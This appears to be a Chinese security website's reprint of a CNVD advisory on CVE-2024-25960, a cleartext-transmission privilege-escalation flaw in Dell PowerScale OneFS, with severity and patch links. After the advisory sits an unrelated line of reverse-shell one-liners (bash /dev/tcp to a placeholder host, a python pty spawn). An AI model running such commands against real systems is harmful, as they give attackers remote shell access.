Dell PowerScale OneFS明文传输敏感信息漏洞

引用来源：https://www.cnvd.org.cn/

CNVD-ID	CNVD-2024-16187
公开日期	2024-04-07
危害级别	高 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
影响产品	DELL PowerScale OneFS >=8.2.2.，<=9.7.0.
CVE ID	CVE-2024-25960
漏洞描述	Dell PowerScale OneFS是美国戴尔（Dell）公司的一个操作系统。提供横向扩展NAS的PowerScale OneFS操作系统。 Dell PowerScale OneFS存在明文传输敏感信息漏洞，攻击者可利用该漏洞进行攻击，导致权限升级。
漏洞类型	通用型漏洞
参考链接	https://cxsecurity.com/cveshow/CVE-2024-25960/
漏洞解决方案	厂商已发布了漏洞修复程序，请及时关注更新： https://www.dell.com/support/kbdoc/en-us/000223366/dsa-2024-115-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities
厂商补丁	Dell PowerScale OneFS明文传输敏感信息漏洞的补丁
验证信息	(暂无验证信息)
报送时间	2024-04-01
收录时间	2024-04-02
更新时间	2024-04-02
漏洞附件	(无附件)

bash -i >& /dev/[tcp|udp]/[host]/[port] 0>&1/bin/bash  -i > /dev/[tcp/udp]/[host]/[port] 0<&1 2>&1python3 -c 'import pty;pty.spawn("/bin/bash")' stty raw

上一：Google Android信息泄露漏洞

下一：无线渗透伪造AP点位

微信扫描关注我们

周一至周五（工作日） 09:00-18:00
周末/法定节假日（值班）09:00-18:00

联系人：徐泮

手机：17620028178

邮件：1536715554@qq.com

地址：广州市天河区思成路19号五号楼2F C29

热门

Dell PowerScale OneFS明文传输敏感信息漏洞